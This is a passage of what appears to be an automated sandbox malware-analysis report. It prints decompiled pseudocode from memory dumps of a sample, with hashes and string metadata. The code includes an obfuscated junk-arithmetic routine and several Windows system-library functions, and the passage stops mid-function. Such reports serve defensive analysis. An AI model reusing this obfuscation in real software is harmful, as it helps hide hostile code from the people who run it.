                            					__ecx =  *0x1fc6ea93;
                            					 *0x1fc6ea93 = 0xed012f6e;
                            					_push(0xe2658ded);
                            					__ebp = __ebp -  *0x764fa967;
                            					__eflags = __ebp;
                            					if(__ebp < 0) {
                            						goto L1;
                            					}
                            					 *0x97f8cc78 - __ebx = __ebx -  *0xa712e631;
                            					asm("rol byte [0xc9c3e3a0], 0xfe");
                            					_push( *0x64c503c1);
                            					__al = __al |  *0x25d9d024;
                            					__esp = __esp + 1;
                            					 *0x4bff8101 = __ebx;
                            					__ebp = __ebp ^ 0x09c2d46c;
                            					 *0xb367c10e = __edx;
                            					 *0x33689ff7 =  *0x33689ff7 & __esp;
                            					__edx = __edx ^  *0xac27b705;
                            					asm("rcl byte [0x117bf4d7], 0xba");
                            					 *0x6b5a459e = __edx;
                            					 *0x33074509 =  *0x33074509 >> 5;
                            					__edi = __edi | 0x9296cc1d;
                            					 *0x4e421dfe =  *0x4e421dfe - __ebp;
                            					_push(__esp);
                            					 *0x99c63119 =  *0x99c63119 >> 0xdc;
                            					__ebx = __ebx & 0x11a5c001;
                            					_push(__ebp);
                            					__eflags = __esp & 0xb8f328d8;
                            					__edi = __edi ^ 0x3a341a1d;
                            					__ecx = __ecx + 1;
                            					__ebx = __ebx - 1;
                            					__esi = __esi + 0xc1c636fa;
                            					__edx =  *0x294db76a * 0xee69;
                            					asm("adc esi, 0x85f851f1");
                            					__eflags = __edx -  *0x9d403501;
                            					if(__edx <  *0x9d403501) {
                            						goto L1;
                            					}
                            					__esi =  *0xeb65e97c * 0x8ffc;
                            					__edi = __edi &  *0x3c8283db;
                            					 *0xfca3a902 =  *0xfca3a902 << 0xfe;
                            					__ebx = __ebx ^ 0xf8907f8d;
                            					__dl = 0xd2;
                            					 *0xe1c29cd6 =  *0xe1c29cd6 >> 0xb8;
                            					__dh = __dh -  *0xe1082e10;
                            					__ebp = __ebp + 1;
                            					__ecx = __ecx +  *0x8f64031;
                            					__eflags = __ecx;
                            					if(__ecx < 0) {
                            						goto L1;
                            					}
                            					__ebp = __ebp +  *0xdec38572;
                            					__ebp = __ebp +  *0x1d790eee;
                            					__eflags = __edx -  *0x9d4c6f11;
                            					__esp = __esp -  *0xae3304ed;
                            					__eflags =  *0x920ca0e7 & __bl;
                            					 *0xfae49cf3 =  *0xfae49cf3 | __ebp;
                            					asm("rcl dword [0xe00a548c], 0x56");
                            					L1();
                            					__edx = __edx +  *0x7649dae8;
                            					__bl = __bl | 0x00000020;
                            					asm("ror byte [0x3ad68c30], 0x5e");
                            					__eflags = __esi;
                            					_pop(__ecx);
                            					if(__eflags != 0) {
                            						goto L1;
                            					}
                            					__edx = 0x93616f7a;
                            					 *0x12a89a24 =  *0x12a89a24 >> 0x39;
                            					asm("stosb");
                            					if(__eflags != 0) {
                            						goto L1;
                            					}
                            					_push( *0xc04e975);
                            					asm("rol dword [0xe26fe20f], 0x88");
                            					 *0xcac9cad2 =  *0xcac9cad2 | __ch;
                            					__eflags =  *0xcac9cad2;
                            					return __eax;
                            				}
                            				L1:
                            				 *0x1be1c709 =  *0x1be1c709 << 0xb3;
                            				asm("adc esi, [0x6a6f2b6e]");
                            				if( *0x1be1c709 > 0) {
                            					_t49 = _t49 &  *0x4e0d0f76;
                            				}
                            				goto L1;
                            			}





                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                            • Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: nKyo
                            • API String ID: 0-2776793979
                            • Opcode ID: f916cfc32c9f2a9d24e1404cf926d6467ac852c2d6caaa7f14e03905002fedbb
                            • Instruction ID: da40c531c293bb8c0dcb9531c5d487d6325c0e47b5cd281460a7a632ec621819
                            • Opcode Fuzzy Hash: f916cfc32c9f2a9d24e1404cf926d6467ac852c2d6caaa7f14e03905002fedbb
                            • Instruction Fuzzy Hash: 7322A772A08385CFDB16CF38D88AB113FB1F35A3A4B49824ED9A1A71D2D734255ACF45
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 80%
                            			E0174FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                            				char _v5;
                            				signed int _v8;
                            				signed int _v12;
                            				char _v16;
                            				char _v17;
                            				char _v20;
                            				signed int _v24;
                            				char _v28;
                            				char _v32;
                            				signed int _v40;
                            				void* __ecx;
                            				void* __edi;
                            				void* __ebp;
                            				signed int _t73;
                            				intOrPtr* _t75;
                            				signed int _t77;
                            				signed int _t79;
                            				signed int _t81;
                            				intOrPtr _t83;
                            				intOrPtr _t85;
                            				intOrPtr _t86;
                            				signed int _t91;
                            				signed int _t94;
                            				signed int _t95;
                            				signed int _t96;
                            				signed int _t106;
                            				signed int _t108;
                            				signed int _t114;
                            				signed int _t116;
                            				signed int _t118;
                            				signed int _t122;
                            				signed int _t123;
                            				void* _t129;
                            				signed int _t130;
                            				void* _t132;
                            				intOrPtr* _t134;
                            				signed int _t138;
                            				signed int _t141;
                            				signed int _t147;
                            				intOrPtr _t153;
                            				signed int _t154;
                            				signed int _t155;
                            				signed int _t170;
                            				void* _t174;
                            				signed int _t176;
                            				signed int _t177;
                            
                            				_t129 = __ebx;
                            				_push(_t132);
                            				_push(__esi);
                            				_t174 = _t132;
                            				_t73 =  !( *( *(_t174 + 0x18)));
                            				if(_t73 >= 0) {
                            					L5:
                            					return _t73;
                            				} else {
                            					L0172EEF0(0x1807b60);
                            					_t134 =  *0x1807b84; // 0x77e47b80
                            					_t2 = _t174 + 0x24; // 0x24
                            					_t75 = _t2;
                            					if( *_t134 != 0x1807b80) {
                            						_push(3);
                            						asm("int 0x29");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						_push(0x1807b60);
                            						_t170 = _v8;
                            						_v28 = 0;
                            						_v40 = 0;
                            						_v24 = 0;
                            						_v17 = 0;
                            						_v32 = 0;
                            						__eflags = _t170 & 0xffff7cf2;
                            						if((_t170 & 0xffff7cf2) != 0) {
                            							L43:
                            							_t77 = 0xc000000d;
                            						} else {
                            							_t79 = _t170 & 0x0000000c;
                            							__eflags = _t79;
                            							if(_t79 != 0) {
                            								__eflags = _t79 - 0xc;
                            								if(_t79 == 0xc) {
                            									goto L43;
                            								} else {
                            									goto L9;
                            								}
                            							} else {
                            								_t170 = _t170 | 0x00000008;
                            								__eflags = _t170;
                            								L9:
                            								_t81 = _t170 & 0x00000300;
                            								__eflags = _t81 - 0x300;
                            								if(_t81 == 0x300) {
                            									goto L43;
                            								} else {
                            									_t138 = _t170 & 0x00000001;
                            									__eflags = _t138;
                            									_v24 = _t138;
                            									if(_t138 != 0) {
                            										__eflags = _t81;
                            										if(_t81 != 0) {
                            											goto L43;
                            										} else {
                            											goto L11;
                            										}
                            									} else {
                            										L11:
                            										_push(_t129);
                            										_t77 = L01726D90( &_v20);
                            										_t130 = _t77;
                            										__eflags = _t130;
                            										if(_t130 >= 0) {
                            											_push(_t174);
                            											__eflags = _t170 & 0x00000301;
                            											if((_t170 & 0x00000301) == 0) {
                            												_t176 = _a8;
                            												__eflags = _t176;
                            												if(__eflags == 0) {
                            													L64:
                            													_t83 =  *[fs:0x18];
                            													_t177 = 0;
                            													__eflags =  *(_t83 + 0xfb8);
                            													if( *(_t83 + 0xfb8) != 0) {
                            														L017276E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                            														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                            													}
                            													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                            													goto L15;
                            												} else {
                            													asm("sbb edx, edx");
                            													_t114 = E017B8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                            													__eflags = _t114;
                            													if(_t114 < 0) {
                            														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                            														E0171B150();
                            													}
                            													_t116 = L017B6D81(_t176,  &_v16);
                            													__eflags = _t116;
                            													if(_t116 >= 0) {
                            														__eflags = _v16 - 2;
                            														if(_v16 < 2) {
                            															L56:
                            															_t118 = L017275CE(_v20, 5, 0);
                            															__eflags = _t118;
                            															if(_t118 < 0) {
                            																L67:
                            																_t130 = 0xc0000017;
                            																goto L32;
                            															} else {
                            																__eflags = _v12;
                            																if(_v12 == 0) {
                            																	goto L67;
                            																} else {
                            																	_t153 =  *0x1808638; // 0x14567b0
                            																	_t122 = L017238A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                            																	_t154 = _v12;
                            																	_t130 = _t122;
                            																	__eflags = _t130;
                            																	if(_t130 >= 0) {
                            																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                            																		__eflags = _t123;
                            																		if(_t123 != 0) {
                            																			_t155 = _a12;
                            																			__eflags = _t155;
                            																			if(_t155 != 0) {
                            																				 *_t155 = _t123;
                            																			}
                            																			goto L64;
                            																		} else {
                            																			L017276E2(_t154);
                            																			goto L41;
                            																		}
                            																	} else {
                            																		L017276E2(_t154);
                            																		_t177 = 0;
                            																		goto L18;
                            																	}
                            																}
                            															}
                            														} else {
                            															__eflags =  *_t176;
                            															if( *_t176 != 0) {
                            																goto L56;
                            															} else {
                            																__eflags =  *(_t176 + 2);
                            																if( *(_t176 + 2) == 0) {
                            																	goto L64;
                            																} else {
                            																	goto L56;
                            																}
                            															}
                            														}
                            													} else {
                            														_t130 = 0xc000000d;
                            														goto L32;
                            													}
                            												}
                            												goto L35;
                            											} else {
                            												__eflags = _a8;
                            												if(_a8 != 0) {
                            													_t77 = 0xc000000d;
                            												} else {
                            													_v5 = 1;
                            													L0174FCE3(_v20, _t170);
                            													_t177 = 0;
                            													__eflags = 0;
                            													L15:
                            													_t85 =  *[fs:0x18];
                            													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                            													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                            														L18:
                            														__eflags = _t130;
                            														if(_t130 != 0) {
                            															goto L32;
                            														} else {
                            															__eflags = _v5 - _t130;
                            															if(_v5 == _t130) {
                            																goto L32;
                            															} else {
                            																_t86 =  *[fs:0x18];
                            																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                            																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                            																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                            																}
                            																__eflags = _t177;
                            																if(_t177 == 0) {
                            																	L31:
                            																	__eflags = 0;
                            																	L017270F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                            																	goto L32;
                            																} else {
                            																	__eflags = _v24;
                            																	_t91 =  *(_t177 + 0x20);
                            																	if(_v24 != 0) {
                            																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                            																		goto L31;
                            																	} else {
                            																		_t141 = _t91 & 0x00000040;
                            																		__eflags = _t170 & 0x00000100;
                            																		if((_t170 & 0x00000100) == 0) {
                            																			__eflags = _t141;
                            																			if(_t141 == 0) {
                            																				L74:
                            																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                            																				goto L27;
                            																			} else {
                            																				_t177 = E0174FD22(_t177);
                            																				__eflags = _t177;
                            																				if(_t177 == 0) {
                            																					goto L42;
                            																				} else {
                            																					_t130 = L0174FD9B(_t177, 0, 4);
                            																					__eflags = _t130;
                            																					if(_t130 != 0) {
                            																						goto L42;
                            																					} else {
                            																						_t68 = _t177 + 0x20;
                            																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                            																						__eflags =  *_t68;
                            																						_t91 =  *(_t177 + 0x20);
                            																						goto L74;
                            																					}
                            																				}
                            																			}
                            																			goto L35;
                            																		} else {
                            																			__eflags = _t141;
                            																			if(_t141 != 0) {
                            																				_t177 = E0174FD22(_t177);
                            																				__eflags = _t177;
                            																				if(_t177 == 0) {
                            																					L42:
                            																					_t77 = 0xc0000001;
                            																					goto L33;
                            																				} else {
                            																					_t130 = L0174FD9B(_t177, 0, 4);
                            																					__eflags = _t130;
                            																					if(_t130 != 0) {
                            																						goto L42;
                            																					} else {
                            																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                            																						_t91 =  *(_t177 + 0x20);
                            																						goto L26;
                            																					}
                            																				}
                            																				goto L35;
                            																			} else {
                            																				L26:
                            																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                            																				__eflags = _t94;
                            																				L27:
                            																				 *(_t177 + 0x20) = _t94;
                            																				__eflags = _t170 & 0x00008000;
                            																				if((_t170 & 0x00008000) != 0) {
                            																					_t95 = _a12;
                            																					__eflags = _t95;
                            																					if(_t95 != 0) {
                            																						_t96 =  *_t95;
                            																						__eflags = _t96;
                            																						if(_t96 != 0) {
                            																							 *((short*)(_t177 + 0x22)) = 0;
                            																							_t40 = _t177 + 0x20;
                            																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                            																							__eflags =  *_t40;
                            																						}
                            																					}
                            																				}
                            																				goto L31;
                            																			}
                            																		}
                            																	}
                            																}
                            															}
                            														}
                            													} else {
                            														_t147 =  *( *[fs:0x18] + 0xfc0);
                            														_t106 =  *(_t147 + 0x20);
                            														__eflags = _t106 & 0x00000040;
                            														if((_t106 & 0x00000040) != 0) {
                            															_t147 = E0174FD22(_t147);
                            															__eflags = _t147;
                            															if(_t147 == 0) {
                            																L41:
                            																_t130 = 0xc0000001;
                            																L32:
                            																_t77 = _t130;
                            																goto L33;
                            															} else {
                            																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                            																_t106 =  *(_t147 + 0x20);
                            																goto L17;
                            															}
                            															goto L35;
                            														} else {
                            															L17:
                            															_t108 = _t106 | 0x00000080;
                            															__eflags = _t108;
                            															 *(_t147 + 0x20) = _t108;
                            															 *( *[fs:0x18] + 0xfc0) = _t147;
                            															goto L18;
                            														}
                            													}
                            												}
                            											}
                            											L33:
                            										}
                            									}
                            								}
                            							}
                            						}
                            						L35:
                            						return _t77;
                            					} else {
                            						 *_t75 = 0x1807b80;
                            						 *((intOrPtr*)(_t75 + 4)) = _t134;
                            						 *_t134 = _t75;
                            						 *0x1807b84 = _t75;
                            						_t73 = E0172EB70(_t134, 0x1807b60);
                            						if( *0x1807b20 != 0) {
                            							_t73 =  *( *[fs:0x30] + 0xc);
                            							if( *((char*)(_t73 + 0x28)) == 0) {
                            								_t73 = L0172FF60( *0x1807b20);
                            							}
                            						}
                            						goto L5;
                            					}
                            				}
                            			}

                            Strings
                            • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0178BE0F
                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                            • API String ID: 0-865735534
                            • Opcode ID: 9650818791928298a2291c2524c83ea47349405d3ca81389bfb7c34e65bb408f
                            • Instruction ID: eb2f7db5cab152484e313ca563884eb3a73d1c6ec6383e1c1cc717597f435889
                            • Opcode Fuzzy Hash: 9650818791928298a2291c2524c83ea47349405d3ca81389bfb7c34e65bb408f
                            • Instruction Fuzzy Hash: 07A12531B00A069FEB26EF6CC454B7AF7A5AF49710F04456EEA46DB781DB30D941CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 75%
                            			E0174F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                            				intOrPtr _v8;
                            				intOrPtr _v12;
                            				intOrPtr _v16;
                            				char* _v20;
                            				intOrPtr _v24;
                            				char _v28;
                            				intOrPtr _v32;
                            				char _v36;
                            				char _v44;
                            				char _v52;
                            				intOrPtr _v56;
                            				char _v60;
                            				intOrPtr _v72;
                            				void* _t51;
                            				void* _t58;
                            				signed short _t82;
                            				short _t84;
                            				signed int _t91;
                            				signed int _t100;
                            				signed short* _t103;
                            				void* _t108;
                            				intOrPtr* _t109;
                            
                            				_t103 = __ecx;
                            				_t82 = __edx;
                            				_t51 = E01734120(0, __ecx, 0,  &_v52, 0, 0, 0);
                            				if(_t51 >= 0) {
                            					_push(0x21);
                            					_push(3);
                            					_v56 =  *0x7ffe02dc;
                            					_v20 =  &_v52;
                            					_push( &_v44);
                            					_v28 = 0x18;
                            					_push( &_v28);
                            					_push(0x100020);
                            					_v24 = 0;
                            					_push( &_v60);
                            					_v16 = 0x40;
                            					_v12 = 0;
                            					_v8 = 0;
                            					_t58 = E01759830();
                            					_t87 =  *[fs:0x30];
                            					_t108 = _t58;
                            					L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                            					if(_t108 < 0) {
                            						L11:
                            						_t51 = _t108;
                            					} else {
                            						_push(4);
                            						_push(8);
                            						_push( &_v36);
                            						_push( &_v44);
                            						_push(_v60);
                            						_t108 = E01759990();
                            						if(_t108 < 0) {
                            							L10:
                            							_push(_v60);
                            							E017595D0();
                            							goto L11;
                            						} else {
                            							_t109 = L01734620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                            							if(_t109 == 0) {
                            								_t108 = 0xc0000017;
                            								goto L10;
                            							} else {
                            								_t21 = _t109 + 0x18; // 0x18
                            								 *((intOrPtr*)(_t109 + 4)) = _v60;
                            								 *_t109 = 1;
                            								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                            								 *(_t109 + 0xe) = _t82;
                            								 *((intOrPtr*)(_t109 + 8)) = _v56;
                            								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                            								E0175F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                            								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                            								 *((short*)(_t109 + 0xc)) =  *_t103;
                            								_t91 =  *_t103 & 0x0000ffff;
                            								_t100 = _t91 & 0xfffffffe;
                            								_t84 = 0x5c;
                            								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                            									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                            										_push(_v60);
                            										E017595D0();
                            										L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                            										_t51 = 0xc0000106;
                            									} else {
                            										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                            										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                            										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                            										goto L5;
                            									}
                            								} else {
                            									L5:
                            									 *_a4 = _t109;
                            									_t51 = 0;
                            								}
                            							}
                            						}
                            					}
                            				}
                            				return _t51;
                            			}

                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID: @
                            • API String ID: 0-2766056989
                            • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                            • Instruction ID: f26f199c98f980477e4ab74480e0f4fc46802521db0024fbe3ec7e5983912ba6
                            • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                            • Instruction Fuzzy Hash: E3516971504715AFC321DF29C840A6BFBF8FF88710F00892AFA9597690E7B4E914CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 75%
                            			E01793540(intOrPtr _a4) {
                            				signed int _v12;
                            				intOrPtr _v88;
                            				intOrPtr _v92;
                            				char _v96;
                            				char _v352;
                            				char _v1072;
                            				intOrPtr _v1140;
                            				intOrPtr _v1148;
                            				char _v1152;
                            				char _v1156;
                            				char _v1160;
                            				char _v1164;
                            				char _v1168;
                            				char* _v1172;
                            				short _v1174;
                            				char _v1176;
                            				char _v1180;
                            				char _v1192;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				short _t41;
                            				short _t42;
                            				intOrPtr _t80;
                            				intOrPtr _t81;
                            				signed int _t82;
                            				void* _t83;
                            
                            				_v12 =  *0x180d360 ^ _t82;
                            				_t41 = 0x14;
                            				_v1176 = _t41;
                            				_t42 = 0x16;
                            				_v1174 = _t42;
                            				_v1164 = 0x100;
                            				_v1172 = L"BinaryHash";
                            				_t81 = E01750BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                            				if(_t81 < 0) {
                            					L11:
                            					_t75 = _t81;
                            					L01793706(0, _t81, _t79, _t80);
                            					L12:
                            					if(_a4 != 0xc000047f) {
                            						E0175FA60( &_v1152, 0, 0x50);
                            						_v1152 = 0x60c201e;
                            						_v1148 = 1;
                            						_v1140 = E01793540;
                            						E0175FA60( &_v1072, 0, 0x2cc);
                            						_push( &_v1072);
                            						L0176DDD0( &_v1072, _t75, _t79, _t80, _t81);
                            						L017A0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                            						_push(_v1152);
                            						_push(0xffffffff);
                            						L017597C0();
                            					}
                            					return L0175B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                            				}
                            				_t79 =  &_v352;
                            				_t81 = E01793971(0, _a4,  &_v352,  &_v1156);
                            				if(_t81 < 0) {
                            					goto L11;
                            				}
                            				_t75 = _v1156;
                            				_t79 =  &_v1160;
                            				_t81 = E01793884(_v1156,  &_v1160,  &_v1168);
                            				if(_t81 >= 0) {
                            					_t80 = _v1160;
                            					E0175FA60( &_v96, 0, 0x50);
                            					_t83 = _t83 + 0xc;
                            					_push( &_v1180);
                            					_push(0x50);
                            					_push( &_v96);
                            					_push(2);
                            					_push( &_v1176);
                            					_push(_v1156);
                            					_t81 = L01759650();
                            					if(_t81 >= 0) {
                            						if(_v92 != 3 || _v88 == 0) {
                            							_t81 = 0xc000090b;
                            						}
                            						if(_t81 >= 0) {
                            							_t75 = _a4;
                            							_t79 =  &_v352;
                            							L01793787(_a4,  &_v352, _t80);
                            						}
                            					}
                            					L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                            				}
                            				_push(_v1156);
                            				E017595D0();
                            				if(_t81 >= 0) {
                            					goto L12;
                            				} else {
                            					goto L11;
                            				}
                            			}

                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID: BinaryHash
                            • API String ID: 0-2202222882
                            • Opcode ID: 14b7ec2463c5fc0c592fd187d355bad9d6cba2a5bc309169ffe5b8e234645ea0
                            • Instruction ID: 45bf849c661c12e1ac933a4a115b32ecdfe004021a2adab3c446e3266a2eb388
                            • Opcode Fuzzy Hash: 14b7ec2463c5fc0c592fd187d355bad9d6cba2a5bc309169ffe5b8e234645ea0
                            • Instruction Fuzzy Hash: 3E4124B1D0152DABDF21DA60DC84FAEF77CAB54714F0045A5EA09AB240DB709E888F95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 72%
                            			E01793884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                            				char _v8;
                            				intOrPtr _v12;
                            				intOrPtr* _v16;
                            				char* _v20;
                            				short _v22;
                            				char _v24;
                            				intOrPtr _t38;
                            				short _t40;
                            				short _t41;
                            				void* _t44;
                            				intOrPtr _t47;
                            				void* _t48;
                            
                            				_v16 = __edx;
                            				_t40 = 0x14;
                            				_v24 = _t40;
                            				_t41 = 0x16;
                            				_v22 = _t41;
                            				_t38 = 0;
                            				_v12 = __ecx;
                            				_push( &_v8);
                            				_push(0);
                            				_push(0);
                            				_push(2);
                            				_t43 =  &_v24;
                            				_v20 = L"BinaryName";
                            				_push( &_v24);
                            				_push(__ecx);
                            				_t47 = 0;
                            				_t48 = L01759650();
                            				if(_t48 >= 0) {
                            					_t48 = 0xc000090b;
                            				}
                            				if(_t48 != 0xc0000023) {
                            					_t44 = 0;
                            					L13:
                            					if(_t48 < 0) {
                            						L16:
                            						if(_t47 != 0) {
                            							L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                            						}
                            						L18:
                            						return _t48;
                            					}
                            					 *_v16 = _t38;
                            					 *_a4 = _t47;
                            					goto L18;
                            				}
                            				_t47 = L01734620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                            				if(_t47 != 0) {
                            					_push( &_v8);
                            					_push(_v8);
                            					_push(_t47);
                            					_push(2);
                            					_push( &_v24);
                            					_push(_v12);
                            					_t48 = L01759650();
                            					if(_t48 < 0) {
                            						_t44 = 0;
                            						goto L16;
                            					}
                            					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                            						_t48 = 0xc000090b;
                            					}
                            					_t44 = 0;
                            					if(_t48 < 0) {
                            						goto L16;
                            					} else {
                            						_t17 = _t47 + 0xc; // 0xc
                            						_t38 = _t17;
                            						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                            							_t48 = 0xc000090b;
                            						}
                            						goto L13;
                            					}
                            				}
                            				_t48 = _t48 + 0xfffffff4;
                            				goto L18;
                            			}

                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID: BinaryName
                            • API String ID: 0-215506332
                            • Opcode ID: 5a18e9d33ed803301bd73229ae4d8532619fb192b8447dab582ff048c33912e3
                            • Instruction ID: 3fdb1a667a45508d9d30bd464a2e23d8141080880b13d671268e004477774d02
                            • Opcode Fuzzy Hash: 5a18e9d33ed803301bd73229ae4d8532619fb192b8447dab582ff048c33912e3
                            • Instruction Fuzzy Hash: E431F17290051AAFEF15DB68D945E7BFB74FB80B38F014169EA04A7241D7309E08C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 33%
                            			E0174D294(void* __ecx, char __edx, void* __eflags) {
                            				signed int _v8;
                            				char _v52;
                            				signed int _v56;
                            				signed int _v60;
                            				intOrPtr _v64;
                            				char* _v68;
                            				intOrPtr _v72;
                            				char _v76;
                            				signed int _v84;
                            				intOrPtr _v88;
                            				char _v92;
                            				intOrPtr _v96;
                            				intOrPtr _v100;
                            				char _v104;
                            				char _v105;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t35;
                            				char _t38;
                            				signed int _t40;
                            				signed int _t44;
                            				signed int _t52;
                            				void* _t53;
                            				void* _t55;
                            				void* _t61;
                            				intOrPtr _t62;
                            				void* _t64;
                            				signed int _t65;
                            				signed int _t66;
                            
                            				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                            				_v8 =  *0x180d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                            				_v105 = __edx;
                            				_push( &_v92);
                            				_t52 = 0;
                            				_push(0);
                            				_push(0);
                            				_push( &_v104);
                            				_push(0);
                            				_t59 = __ecx;
                            				_t55 = 2;
                            				if(E01734120(_t55, __ecx) < 0) {
                            					_t35 = 0;
                            					L8:
                            					_pop(_t61);
                            					_pop(_t64);
                            					_pop(_t53);
                            					return L0175B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                            				}
                            				_v96 = _v100;
                            				_t38 = _v92;
                            				if(_t38 != 0) {
                            					_v104 = _t38;
                            					_v100 = _v88;
                            					_t40 = _v84;
                            				} else {
                            					_t40 = 0;
                            				}
                            				_v72 = _t40;
                            				_v68 =  &_v104;
                            				_push( &_v52);
                            				_v76 = 0x18;
                            				_push( &_v76);
                            				_v64 = 0x40;
                            				_v60 = _t52;
                            				_v56 = _t52;
                            				_t44 = E017598D0();
                            				_t62 = _v88;
                            				_t65 = _t44;
                            				if(_t62 != 0) {
                            					asm("lock xadd [edi], eax");
                            					if((_t44 | 0xffffffff) != 0) {
                            						goto L4;
                            					}
                            					_push( *((intOrPtr*)(_t62 + 4)));
                            					E017595D0();
                            					L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                            					goto L4;
                            				} else {
                            					L4:
                            					L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                            					if(_t65 >= 0) {
